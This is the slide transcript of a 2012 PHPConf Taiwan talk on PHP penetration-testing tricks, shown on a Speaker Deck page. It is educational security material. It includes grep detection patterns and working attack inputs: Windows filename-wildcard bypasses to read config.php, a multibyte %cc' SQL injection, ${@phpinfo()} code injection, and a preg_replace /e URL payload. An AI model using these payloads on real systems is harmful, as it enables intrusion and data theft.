Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Security in PHP 那些在滲透測試的小技巧
Search
Orange
August 21, 2024
0
120
Security in PHP 那些在滲透測試的小技巧
PHPConf Taiwan 2012
Orange
August 21, 2024
Tweet
Share
More Decks by Orange
See All by Orange
Best Practices - The Upload
p8361
0
67
網頁安全 Web Security 入門
p8361
0
130
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
13k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
13k
Featured
See All Featured
Product Roadmaps are Hard
iamctodd
PRO
53
11k
Testing 201, or: Great Expectations
jmmastey
42
7.5k
Build The Right Thing And Hit Your Dates
maggiecrowley
35
2.7k
Improving Core Web Vitals using Speculation Rules API
sergeychernyshev
15
880
The Success of Rails: Ensuring Growth for the Next 100 Years
eileencodes
45
7.3k
Fashionably flexible responsive web design (full day workshop)
malarkey
407
66k
Mobile First: as difficult as doing things right
swwweet
223
9.6k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
32
2.3k
実際に使うSQLの書き方 徹底解説 / pgcon21j-tutorial
soudai
PRO
180
53k
Save Time (by Creating Custom Rails Generators)
garrettdimon
PRO
31
1.2k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
105
19k
Connecting the Dots Between Site Speed, User Experience & Your Business [WebExpo 2025]
tammyeverts
1
71
Transcript
2012/11/03 @ PHPCONF <Orange@chroot.org>
• aka Orange • 2009 • 2011 • 2011 AVTOKYO
• – – Web Security – Windows Vulnerability Exploitation
• CHROOT Security Group • NISRA • case. • Blog
– http://blog.orange.tw/
None
None
None
▪▪
None
<?php $url = $_GET['url']; echo urlencode( $url ); ?>
• Low – Sensitive Information Leakage… • Middle – Insecure
File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
None
• – – –
• showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc
– getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
None
None
1. Router, Controller URL Mapping 2. 3. 4. DB ORM
PHP orz
1. – system exec shell_exec popen eval create_function call_user_func preg_replace…
2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …
• grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –
(select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……
• grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –
HTTP_RAW_POST_DATA – php://input – …
try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();
require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
None
None
<?php $name = $_GET['name']; $name = basename( $name ); if
( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>
• down.php?name= – config.php – config"php – config.ph> – config.<
– c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
None
• file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >
php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
None
• file_get_contents • file_put_contents • file • readfile • phar_file_get_contents
• include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
None
• config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*
(2012/10/26)
None
• Web Browser PHP Output (HTML) – Cross-Site Scripting •
DB Management PHP Output (SQL) – SQL Injection
SELECT * FROM [table] WHERE username = 'PHPCONF'
SELECT * FROM [table] WHERE username = 'PHPCONF\''
SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''
Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'
PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE
• addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –
pdo – mysql_real_escape_st ring
None
• $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url
= "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";
config.php $dbuser = "root";
config.php $dbuser = "${@phpinfo()}";
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}
Think PHP
None
– – – – – –
• PHP Security – http://blog.php-security.org/ • Oddities of PHP file
access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
None